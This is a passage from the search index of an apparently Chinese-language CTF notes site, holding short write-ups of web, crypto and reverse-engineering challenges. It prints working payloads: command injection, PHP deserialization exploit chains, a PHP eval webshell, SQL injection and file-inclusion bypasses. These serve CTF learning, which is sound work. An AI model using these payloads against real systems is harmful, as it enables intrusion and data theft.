","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/RSA%E7%AE%97%E6%B3%95%E5%8E%9F%E7%90%86/#_4","title":"\u603b\u7ed3\uff1a","text":"\u5728RSA\u5bc6\u7801\u5e94\u7528\u4e2d\uff0c\u516c\u94a5\u662f\u88ab\u516c\u5f00\u7684\uff0c\u5373e\u548cn\u7684\u6570\u503c\u662f\u53ef\u4ee5\u88ab\u5f97\u5230\u7684\u3002\u7834\u89e3RSA\u5bc6\u7801\u5c31\u662f\u4ece\u5df2\u77e5\u7684\u989d\u548cn\u6c42\u5f97d\u3002\u8fd9\u6837\u5c31\u53ef\u4ee5\u4f7f\u7528\u79c1\u94a5\u6765\u7834\u89e3\u5bc6\u6587\u4e86\u3002
\u4f46\u5f53p\u548cq\u662f\u4e00\u4e2a\u5f88\u5927\u7684\u7d20\u6570\u65f6\uff0c\u4ecen\u53bb\u5206\u89e3\u56e0\u5b50p\u548cq\uff0c\u662f\u6570\u5b66\u754c\u516c\u8ba4\u7684\u96be\u9898\u3002
\u56e0\u6b64\uff0c\u5728\u8fdb\u884cRSA\u52a0\u5bc6\u7684\u65f6\u5019\uff0c\u5e94\u5c3d\u91cf\u7684\u4f7f\u7528\u8db3\u591f\u5927\u7684p\u548cq\uff0c\u6765\u4fdd\u8bc1d\u4e0d\u4f1a\u88ab\u7b97\u51fa
\u4f46\u662f\uff0cRSA\u7684\u7f3a\u70b9\u4e5f\u5f88\u660e\u663e\uff1a
\u200b RSA\u7684\u5b89\u5168\u6027\u5b8c\u5168\u6765\u81ea\u4e8e\u56e0\u5b50\u5206\u89e3\uff0c\u7834\u8bd1RSA\u7684\u96be\u5ea6\u7b49\u4ef7\u4e8e\u5206\u89e3\u56e0\u5b50\u7684\u96be\u5ea6
\u200b \u5bc6\u94a5\u7684\u4ea7\u751f\u5341\u5206\u9ebb\u70e6\uff0c\u53d7\u5230p\u548cq\u7684\u5f71\u54cd\uff0c\u5f88\u96be\u505a\u5230\u4e00\u6b21\u4e00\u4e2a\u5bc6\u94a5
\u200b RSA\u9700\u8981\u66f4\u957f\u7684\u5bc6\u94a5\uff0c\u8fd9\u5c31\u4f7f\u5f97\u8fd0\u7b97\u901f\u5ea6\u8f83\u6162\u3002
","tags":["\u7b2c\u4e09\u4e2a\u6807\u7b7e"]},{"location":"ctfnotes/problem-1096-wp/","title":"[GXYCTF 2019]Ping Ping Ping","text":"\u6c99\u7bb1 $ISF9\u7ed5\u8fc7\u7a7a\u683c
exp ?ip=localhost;a=ag;b=fl;cat$IFS$9$b$a.php
\u7136\u540eF12\u770b\u5c31\u80fd\u770b\u5230\u4e86~~\u624d\u4e0d\u4f1a\u8bf4\u56e0\u4e3a\u8fd9\u4e2a\u5361\u4e86\u591a\u4e45~~
"},{"location":"ctfnotes/problem-1852-wp/","title":"[NISACTF 2022]babyserialize","text":" \u5ba1\u8ba1\u6e90\u7801 \u6784\u5efapop\u94fe NISA.__invoke()\n=>Ilovetxw.__toString()\n =>four.__set(fun,\"sixsixsix\")\n =>Ilovetxw.__call(nisa,\"sixsixsix\")\n =>TianXiWei.__wakeup()\n
\u5199exp <?php\n\nclass NISA\n{\n public $fun = \"show_me_fla\";\n public $txw4ever;\n public function __wakeup()\n {\n if ($this->fun == \"show_me_flag\") {\n hint();\n }\n }\n function __call($from, $val)\n {\n $this->fun = $val[0];\n }\n\n public function __toString()\n {\n echo $this->fun;\n return \" \";\n }\n public function __invoke()\n {\n checkcheck($this->txw4ever);\n @eval($this->txw4ever);\n }\n}\n\nclass TianXiWei\n{\n public $ext;\n public $x;\n public function __wakeup()\n {\n $this->ext->nisa($this->x);\n }\n}\n\nclass Ilovetxw\n{\n public $huang;\n public $su;\n public function __call($fun1, $arg)\n {\n $this->huang->fun = $arg[0];\n }\n\n public function __toString()\n {\n $bb = $this->su;\n return $bb();\n }\n}\n\nclass four\n{\n public $a = \"TXW4EVER\";\n private $fun = 'abc';\n public function __set($name, $value)\n {\n $this->$name = $value;\n if ($this->fun = \"sixsixsix\") {\n strtolower($this->a);\n }\n }\n}\n\n$a = new NISA;\n$b = new Ilovetxw;\n$c = new four;\n$d = new Ilovetxw;\n$f = new TianXiWei;\n//\n//$a->txw4ever = 'SYSTEM(\"ls /\");';\n$a->txw4ever = 'SYSTEM(\"cat /fllllllaaag\");';\n$b->su = $a;\n$c->a = $b;\n$d->huang = $c;\n$f->x = \"sixsixsix\";\n$f->ext = $d;\n\necho urlencode(serialize($f));\n//\n\n
\u5f97\u5230flag
"},{"location":"ctfnotes/problem-2026-wp/","title":"[NISACTF 2022]bingdundun~","text":"phar \u4e0a\u4f20\u7136\u540ephar\u4f2a\u534f\u8bae\u8bbf\u95ee
\n//pchar.php\n<?php\n$phar = new Phar('exp.phar'); //\n$phar->buildFromDirectory('./exp');//buildFromDirectory\u6307\u5b9a\u538b\u7f29\u7684\u76ee\u5f55\n$phar->compressFiles(Phar::GZ); //Phar::GZ\u8868\u793a\u4f7f\u7528gzip\u6765\u538b\u7f29\u6b64\u6587\u4ef6\n$phar->stopBuffering();\n$phar->setStub($phar->createDefaultStub('exp.php'));//setSub\u7528\u6765\u8bbe\u7f6e\u542f\u52a8\u52a0\u8f7d\u7684\u6587\u4ef6\n?>\n//exp/exp.php\n<?php\n@eval($_POST['shell']);\n?>\n
\u6700\u540e\u8681\u5251\u8bbf\u95ee \u5bc6\u7801shell ?bingdundun=phar://./upload_name/exp
flag\u5c31\u5728/flag\u91cc
"},{"location":"ctfnotes/problem-2036-wp/","title":"[NISACTF 2022]level-up","text":" level-1 \u8fdb\u5165\u5199\u7740nothing here F12\u53d1\u73b0\u5199\u7740disallow \u63a8\u6d4brobots.txt \u8bbf\u95ee\u5373\u83b7\u5f97level 2\u5730\u5740 level-2 php md5 \u5f3a\u78b0\u649e post array1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2 &array2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2 \u89e3\u51b3 \u5f97\u5230level 3\u5730\u5740 level-3 php sha1 \u5f3a\u78b0\u649e post array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1 &array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1 \u5f97\u5230level-4\u5730\u5740 level-4 php\u53d8\u91cf\u89e3\u6790\u7ed5\u8fc7 \u4f7f\u7528GET NI+SA+=txw4ever \u5f97\u5230level5\u5730\u5740 level-5 createfunction\u7ed5\u8fc7 exp ?a=\\create_function&b=return%200;}var_dump(system(\"cat%20/flag\"));/*
\u5f97\u5230flag "},{"location":"ctfnotes/problem-2049-wp/","title":"[NISACTF 2022]huaji?","text":" binwalk\u5206\u6790 \u5f97\u5230\u5185\u90e8\u6709\u4e2a\u538b\u7f29\u5305 \u52a0\u5bc6\u4e86 \u5728\u539f\u56fe\u5927\u7a7a\u767d\u5904\u627e\u5230 \u4e24\u6bb5 6374665f4e4953415f32303232 6e6973615f32303232 hex\u7f16\u7801\u5f97 ctf_NISA_2022 \u548cnisa_2022 \u6210\u529f\u89e3\u538b\u538b\u7f29\u5305\u5f97\u5230flag "},{"location":"ctfnotes/problem-2074-wp/","title":"[NSSCTF 2022 Spring Recruit]ezgame","text":"F12\u5206\u6790\u5373\u62ffflag\u5728./js/preload.js\u91cc
"},{"location":"ctfnotes/problem-2076-wp/","title":"[NSSCTF 2022 Spring Recruit]babyphp","text":" \u7b2c\u4e00\u5c42\u975e\u7a7a\u6570\u7ec4\u7ed5\u8fc7 post a[]=[1] \u975e\u7a7a\u7a7a\u6570\u7ec4MD5 post b1[]=[1]&b2[]=[2] MD5 \u7ed5\u8fc7 post c1=s878926199a&c2=s155964671a "},{"location":"ctfnotes/problem-2099-wp/","title":"[NISACTF 2022]popchains","text":" \u5ba1\u8ba1\u6e90\u7801 \u6784\u5efapop\u94fe Try_Work_Hard.__invoke()\n =>Make_a_change.__get\n => Road_is_Long.__toString()\n => Road_is_Long.__wakeup()\n
\u7f16\u5199exp ~~\u6709\u574fb\u8bef\u5bfc\u6211\u6211\u4e0d\u8bf4\u662f\u8c01~~ <?php\n\n//echo 'Happy New Year~ MAKE A WISH<br>';\n\n/***************************pop your 2022*****************************/\n\nclass Road_is_Long\n{\n public $page;\n public $string;\n public function __construct($file = 'index.php')\n {\n $this->page = $file;\n }\n public function __toString()\n {\n return $this->string->page;\n }\n\n public function __wakeup()\n {\n if (preg_match(\"/file|ftp|http|https|gopher|dict|\\.\\./i\", $this->page)) {\n echo \"You can Not Enter 2022\";\n $this->page = \"index.php\";\n }\n }\n}\n\nclass Try_Work_Hard\n{\n protected $var;\n public function __construct(){\n $this->var = \"/flag\";\n }\n public function append($value)\n {\n include($value);\n }\n public function __invoke()\n {\n $this->append($this->var);\n }\n}\n\nclass Make_a_Change\n{\n public $effort;\n public function __construct()\n {\n $this->effort = array();\n }\n\n public function __get($key)\n {\n $function = $this->effort;\n return $function();\n }\n}\n\n$a = new Try_Work_Hard;\n$b = new Make_a_Change;\n$c = new Road_is_Long;\n$d = new Road_is_Long;\n\n$b->effort = $a;\n$c->string = $b;\n$d->page = $c;\necho \"?wish=\" . urlencode(serialize($d));\n
"},{"location":"ctfnotes/problem-227-wp/","title":"[\u7f8a\u57ce\u676f 2021]Bigrsa","text":" \u5171\u4eab\u7d20\u6570 $n_1 n_2$\u6709\u4e00\u7d20\u6570\u516c\u56e0\u6570$p$ $n_1=pq_1 n_2=pq_2$ $d_1e\\equiv 1\\space mod\\space\\varphi(n_1)$ $d_2e\\equiv 1\\space mod\\space\\varphi(n_2)$ $\\therefore \u53ea\u9700\u8981\u9006\u5143\u6c42\u51fa\\frac{1}{e}\\space mod\\space \\varphi(n_1)\u548c\\frac{1}{e}\\space mod\\space \\varphi(n_2)\u5c31\u53ef\u4ee5\u5f97\u5230d_1\u548cd_2$ exp from gmpy2 import *\nfrom Crypto.Util.number import *\n\nn1 = 103835296409081751860770535514746586815395898427260334325680313648369132661057840680823295512236948953370895568419721331170834557812541468309298819497267746892814583806423027167382825479157951365823085639078738847647634406841331307035593810712914545347201619004253602692127370265833092082543067153606828049061\nn2 = 115383198584677147487556014336448310721853841168758012445634182814180314480501828927160071015197089456042472185850893847370481817325868824076245290735749717384769661698895000176441497242371873981353689607711146852891551491168528799814311992471449640014501858763495472267168224015665906627382490565507927272073\ne = 65537\nc = 60406168302768860804211220055708551816238816061772464557956985699400782163597251861675967909246187833328847989530950308053492202064477410641014045601986036822451416365957817685047102703301347664879870026582087365822433436251615243854347490600004857861059245403674349457345319269266645006969222744554974358264\np = gmpy2.gcd(n1, n2)\nq1, q2 = n1//p, n2//p\nphi_n1, phi_n2 = (p-1)*(q1-1), (p-1)*(q2-1)\nd1, d2 = inverse(e, phi_n1), inverse(e, phi_n2)\n\nm = pow(pow(c, d2, n2), d1, n1)\nprint(long_to_bytes(m).decode())\n
"},{"location":"ctfnotes/problem-2422-wp/","title":"[\u9e4f\u57ce\u676f 2022]\u7b80\u5355\u5305\u542b","text":" \u5ba1\u8ba1\u6e90\u7801\u53d1\u73b0\u5176\u4f1ainclude'flag'\u7684\u6587\u4ef6\u8fdb\u6765 \u5c1d\u8bd5post flag exp-fake
flag = flag.php\n
\u83b7\u5f97nssctf waf!
\u5c1d\u8bd5\u83b7\u53d6flag.php
flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php\n
\u4ecd\u7136\u83b7\u5f97\u83b7\u5f97nssctf waf!
\u5c1d\u8bd5\u83b7\u53d6index.php
flag = php://filter/read=convert.base64-encode/resource=/var/www/html/index.php\n
\u89e3\u7801\u5f97
<?php\n\n$path = $_POST[\"flag\"];\n\nif (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {\n echo 'nssctf waf!';\n} else {\n @include($path);\n} ?>\n\n<code>\n<span style=\"color: #000000\">\n<span style=\"color: #0000BB\"><?php <br />highlight_file</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">__FILE__</span><span style=\"color: #007700\">);<br />include(</span><span style=\"color: #0000BB\">$_POST</span><span style=\"color: #007700\">[</span><span style=\"color: #DD0000\">\"flag\"</span><span style=\"color: #007700\">]);<br /></span><span style=\"color: #FF8000\">//flag in /var/www/html/flag.php;</span>\n</span>\n</code><br />\n\n
\u5f97\u77e5\u53ef\u4ee5\u901a\u8fc7post\u8d85\u957f\u7684request\u6765\u7ed5\u8fc7 \u6240\u4ee5 exp
a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag = php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php\n
\u89e3\u7801\u5373\u83b7\u5f97flag
"},{"location":"ctfnotes/problem-2602-wp/","title":"[HUBUCTF 2022 \u65b0\u751f\u8d5b]checkin","text":" \u5ba1\u8ba1\u6e90\u7801 \u53d1\u73b0\u4f7f\u7528 == \u5199exp <?php \n$data_unserialize = [\"username\"=>true,\"password\"=>true];\necho \"?info=\"urlencode(serialize(($data_unserialize)));\n
\u4f20\u5165\u5373\u5f97
"},{"location":"ctfnotes/problem-39-wp/","title":"[SWPU 2019]\u795e\u5947\u7684\u4e8c\u7ef4\u7801","text":" binwalk \u5206\u6790 \u53d1\u73b0\u91cc\u9762\u67094\u4e2a\u538b\u7f29\u5305 binwalk -b \u89e3\u5f00 \u5f97\u5230flag.doc
,flag.jpg
,encode.txt
,good.rar
4\u4e2a\u4e3b\u8981\u6587\u4ef6 \u5bf9flag.doc\u5185\u90e8\u5185\u5bb9\u89e3\u7801 \u5f97\u5230 comEON_YOuAreSOSoS0great
\u8fd9\u4e2a\u5c31\u662fgood.rar\u7684\u89e3\u538b\u5bc6\u7801 \u89e3\u5f00good.rar\u5f97\u5230good.mp3 \u542c\u4e00\u4e0b\u4e3a\u6469\u65af\u7535\u7801 Audacity \u53ef\u89c6\u5316 \u5728\u7ebf\u89e3\u7801\u4e0b\u5f97\u5230flag "},{"location":"ctfnotes/problem-403-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]\u7b80\u7b80\u5355\u5355\u7684\u903b\u8f91","text":" \u5ba1\u8ba1\u6e90\u7801 \u56e0\u4e3a\u5f02\u6216\u7684\u9006\u8fd0\u7b97\u5c31\u662f\u5f02\u6216 \u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u7f16\u5199exp \u7f16\u5199exp def decode(cipher):\n flag = ''\n for i in range(len(list)):\n key = (list[i]>>4)+((list[i] & 0xf)<<4)\n now = cipher[2*i:2*i+2]\n print(now)\n now = int(now,16)\n print(now)\n now^=key\n flag+=chr(now)\n print(flag)\ndecode(result)\n
"},{"location":"ctfnotes/problem-404-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]\u7b80\u7b80\u5355\u5355\u7684\u89e3\u5bc6","text":"\u6ca1\u4ec0\u4e48\u597d\u5199\u7684\u7167\u7740\u4ee3\u7801\u9006\u56de\u53bb\u5c31\u884c\u4e86
import base64\nimport urllib.parse\nkey = \"HereIsFlagggg\"\ns_box = list(range(256))\nj = 0\nfor i in range(256):\n j = (j + s_box[i] + ord(key[i % len(key)])) % 256\n s_box[i], s_box[j] = s_box[j], s_box[i]\nenc = \"%C2%A6n%C2%87Y%1Ag%3F%C2%A01.%C2%9C%C3%B7%C3%8A%02%C3%80%C2%92W%C3%8C%C3%BA\"\n\nenc = urllib.parse.unquote(enc)\ncrypt = str(base64.b64encode(bytes(enc, 'utf8')), 'utf-8')\ncipher = base64.b64decode(bytes(crypt, 'utf8')).decode('utf-8')\nres = list(cipher)\nflag = ''\ni = j = 0\nfor s in res:\n i = (i + 1) % 256\n j = (j + s_box[i]) % 256\n s_box[i], s_box[j] = s_box[j], s_box[i]\n t = (s_box[i] + s_box[j]) % 256\n k = s_box[t]\n flag += chr(ord(s)^k)\nprint(flag)\n
"},{"location":"ctfnotes/problem-413-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]crypto2","text":"\u5171\u6a21\u653b\u51fb
\u987a\u4fbf\u5de9\u56fa\u4e0brsa
\u7b26\u53f7 c
:\u5bc6\u6587 m
:\u660e\u6587 (d,n)
:\u79c1\u94a5 (e,n)
:\u516c\u94a5
p
q
\u4e3a\u751f\u6210n
\u7684\u4e24\u4e2a\u5927\u8d28\u6570
\u6709$n=pq$ \u7531\u6b27\u62c9\u51fd\u6570\u7684\u5b9a\u4e49\u5f97$\\varphi (n)=\\varphi (p)\\varphi (q)=(p-1)(q-1)$
\u4efb\u610f\u9009\u4e00\u6b63\u6574\u6570e \u4f7f\u5f97$gcd(e,\\varphi (n))=1$
$d$ \u6ee1\u8db3 $(de)\\space mod \\space \\varphi (n)=1$ \u5373 $(de) = k\\varphi (n)+1,k \\ge 1$
\u5c06$m$\u52a0\u5bc6\u4e3a$c$ $c=m^e\\space mod \\space n$
\u5c06$c$\u89e3\u5bc6\u4e3a$m$
$m=c^d\\space mod \\space n$
\u8bc1\u660e $$ \\because c=m^e\\space mod \\space n\\ \\therefore c \\equiv m^e\\space mod \\space n\\ \\therefore c^d \\equiv m^{ed}\\space mod \\space n\\ \\therefore c^d \\equiv m^{k\\varphi (n)+1}\\space mod \\space n\\ \\space\\ \u5f53gcd(m,n)=1\u65f6\u6709:\\ c^d \\equiv (m^{\\varphi (n)})^{k}\\times m\\space mod \\space n\\ c^d \\equiv 1^k\\times m\\space mod \\space n\\ c^d \\equiv m\\space mod \\space n\\ \\space\\ \u5f53gcd(m,n)\\ne1\u65f6\u6709:\\ \u6b64\u65f6\u5fc5\u5b9a\u6709gcd(q,m)=1\u6216gcd(p,m)=1\\ \u8bbem=m^{'}p \\space \u6b64\u65f6 gcd(q,m)=1\\ c^d \\equiv m^{k\\varphi (p)\\varphi (q)}\\times m\\space mod\\space n\\ c^d \\equiv (m^{\\varphi(q)\\varphi(p)})^{k}\\times m\\space mod \\space n\\ \u53c8\\because m^{\\varphi(q)}\\equiv 1 \\space mod \\space q\\ \\therefore m^{k\\varphi(q)\\varphi(p)}\\equiv 1^{k\\varphi(p)} \\space mod \\space q\\ \\therefore m^{k\\varphi(q)\\varphi(p)}=(k_2q+1) \u4ee3\u5165\u5f97\\ c^d \\equiv (k_2q+1)\\times m\\space mod \\space n\\ c^d \\equiv (k_2m^{'}pq+m)\\times m\\space mod \\space n\\ c^d \\equiv m\\space mod \\space n\\ \u8bc1\u6bd5. $$
\u9644: 1. \u6b27\u62c9\u5b9a\u7406 $$ a^{\\varphi(n)}\\equiv 1\\space mod\\space n,\u5f53gcd(n,a)=1\u4e14n,a\\ge0 $$ \u4e14\u5f53n\u4e3a\u8d28\u6570\u65f6\u4e3a\u8d39\u9a6c\u5c0f\u5b9a\u7406 $$ a^{n-1}\\equiv 1(mod\\space n) $$
\u5171\u6a21\u653b\u51fb\u539f\u7406
$e_1,e_2,n,c_1,c_2$ \u5df2\u77e5 \u4e14 $c_1=m^{e_1}\\space mod \\space n$ $c_2=m^{e_2}\\space mod \\space n$ \u5f53$gcd(e_1,e_2)=1$
\u6709$m=(c_1^{s_1}\\times c_2^{s_2})\\space mod \\space n$ \u5176\u4e2d$e_1s_1+e_2s_2=1$ \u8bc1\u660e $$ m\\ =m^1\\ =m^{e_1s_1+e_2s_2}\\ =(m^{e_1})^{s_1}(m^{e_2})^{s_2}\\ \\equiv c_1^{s_1}c_2^{s_2}\\space mod\\space n\\ \u8bc1\u6bd5. $$
\u6240\u4ee5\u89e3\u5171\u6a21\u9898\u65f6\u53ea\u8981\u7528exgcd\u6c42\u51fa $s_1,s_2$
\u9644: 1. \u8d1d\u7956\u5b9a\u7406 $$ ax+by=gcd(a,b) $$
"},{"location":"ctfnotes/problem-440-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]pop","text":"~~\u4f60\u8fd9\u4e2a\u53d6\u540d\u771f\u7684\u53ef\u4ee5\u7684~~ 1. \u5ba1\u8ba1\u6e90\u7801 2. \u5bfb\u627epop\u94fe
\u77e5\u8bc6\u70b9: \u53d8\u91cf\u540e\u9762\u52a0\u62ec\u53f7\u662f\u52a8\u6001\u8c03\u7528\u51fd\u6570
$abc('asd')\n\u7b49\u4ef7\u4e8e\nasd(abc);\n
unserialize -> w22m.__construct -> w22m.__destruct -> w33m.__toString -> w44m.__construct & w44m.Getflag
\u7f16\u5199exp <?php\nclass w44m\n{\n private $admin = 'aaa';\n protected $passwd = '123456';\n public function __construct()\n {\n $this->admin = 'w44m';\n $this->passwd = '08067';\n }\n public function Getflag()\n {\n if ($this->admin === 'w44m' && $this->passwd === '08067') {\n include('flag.php');\n echo $flag;\n } else {\n echo $this->admin;\n echo $this->passwd;\n echo 'nono';\n }\n }\n}\nclass w33m\n{\n public $w00m;\n public $w22m;\n public function __toString()\n {\n $this->w00m->{$this->w22m}();\n return 0;\n }\n public function __construct(){\n $this->w22m = \"Getflag\";\n $this->w00m = new w44m;\n }\n}\nclass w22m\n{\n public $w00m;\n public function __destruct()\n {\n echo $this->w00m;\n }\n public function __construct()\n {\n $this->w00m = new w33m;\n }\n}\n\n$a = new w22m;\necho \"?w00m=\".urlencode(serialize($a))\n ?>\n
"},{"location":"ctfnotes/problem-442-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]sql","text":" \u4f20\u5165wllm\u53c2\u6570 hint:Want Me? Cross the Waf \u6c99\u7bb1\u7ed5\u8fc7 \u4e3b\u8981\u9650\u5236\u4e3a ban \u7a7a\u683c \u7b49\u53f7 \u9650\u5236\u8f93\u51fa\u5927\u5c0f20\u5b57 exp\u7f16\u5199 exp1(\u67e5\u8be2\u6570\u636e\u8868) ?wllm=-1'union/**/select/**/1,group_concat(TABLE_NAME),3/**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA/**/like/**/'test_db'%23
\u53ef\u4ee5\u770b\u5230test_db\u5185\u7684\u8868 \u6709LTLT_flag\u548cuser exp2(\u67e5\u8be2\u8868\u5185\u5b57\u6bb5) ?wllm=-1'union/**/select/**/1,group_concat(COLUMN_NAME),3/**/from/**/information_schema.columns/**/where/**/TABLE_NAME/**/like/**/'LTLT_flag'%23
exp3(\u8f93\u51faflag) ?wllm=-1'union/**/select/**/1,mid(group_concat(flag),1,21),mid(group_concat(flag),21,40)/**/from/**/test_db.LTLT_flag%23
"},{"location":"ctfnotes/problem-444-wp/","title":"[SWPUCTF 2021 \u65b0\u751f\u8d5b]re1","text":" IDA\u53cd\u7f16\u8bd1 \u53d1\u73b0\u53ea\u662f\u505a\u7b80\u5355\u5b57\u7b26\u66ff\u6362 \u5199exp exp #include <iostream>\nusing namespace std;\nstring str2 = \"{34sy_r3v3rs3}\";\nvoid dfs(int now)\n{\n if (now == str2.length() - 1)\n {\n cout << \"NSSCTF\" << str2 << endl;\n return;\n }\n if (str2[now] == 52)\n {\n str2[now] = 97;\n dfs(now + 1);\n str2[now] = 52;\n dfs(now + 1);\n }\n else if (str2[now] == 51)\n {\n str2[now] = 101;\n dfs(now + 1);\n str2[now] = 51;\n dfs(now + 1);\n }\n else\n {\n dfs(now + 1);\n }\n}\nint main()\n{\n freopen(\"ans.txt\", \"w\", stdout);\n dfs(0);\n}\n
\u5f97\u5230flag
"},{"location":"ctfnotes/problem-463-wp/","title":"[\u9e64\u57ce\u676f 2021]EasyP","text":" \u5ba1\u9605\u4ee3\u7801 \u77e5\u8bc6\u70b9: php\u4f1a\u5c06 ' ','.','[','chr(128)-chr(159)'
\u5f53\u505a'_' basename\u51fd\u6570\u9047\u5230\u975eascii\u4f1a\u820d\u5f03 \u5373\u53ef\u6784\u5efaexp
/index.php/utils.php/%ff?show%20source
"},{"location":"ctfnotes/problem-47-wp/","title":"[SWPU 2020]\u5957\u5a03","text":"~~\u8bf4\u597d\u7684\u5957\u5a03\u5462~~ 1. \u4e0b\u8f7d\u5f97\u5230xlsx \u89e3\u538b\u5373\u5f97RC4data.txt
\u548cswpu.xlsx
2. \u89e3\u538bswpu.xlsx
\u5f97esayrc4.xlsx
\u548cRC4key.zip
3. \u53d1\u73b0RC4key.zip
\u9700\u8981\u5bc6\u7801 \u53bbesayrc4.xlsx
\u5bfb\u627e\u7ebf\u7d22 \u53d1\u73b0esayrc4.xlsx
\u65e0\u6cd5\u89e3\u538bHxD
\u6253\u5f00\u5c31\u627e\u5230\u4e86password \u62ffpassword\u89e3\u538bRC4key.zip
\u7136\u540e\u5728\u7ebf\u89e3\u5bc6\u4e0bRC4data.txt
\u5c31\u5f97\u5230flag
"},{"location":"posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956","text":"\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u53c8\u6709\u4e86\u65b0\u52a8\u5411\u300212\u67087\u65e5\uff0c2017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u603b\u51b3\u8d5b\u5728\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66\u76db\u5927\u5f00\u5e55\uff0c\u6765\u81ea\u5168\u56fd57\u6240\u9ad8\u6821\u7684\u7f51\u7edc\u5b89\u5168\u5b9e\u6218\u8d5b\u961f\u5728\u201c\u6570\u636e\u8d5b\u3001\u4f01\u4e1a\u8d5b\u3001\u4e2a\u4eba\u8d5b\u201c\u4e09\u4e2a\u65b9\u5411\u6bd4\u8d5b\u4e2d\u4e00\u51b3\u9ad8\u4e0b\uff0c\u4e3a\u5168\u56fd\u7f51\u7edc\u5b89\u5168\u5e02\u573a\u63d0\u4f9b\u4e86\u65b0\u4e00\u6279\u9ad8\u7aef\u4eba\u624d\u3002
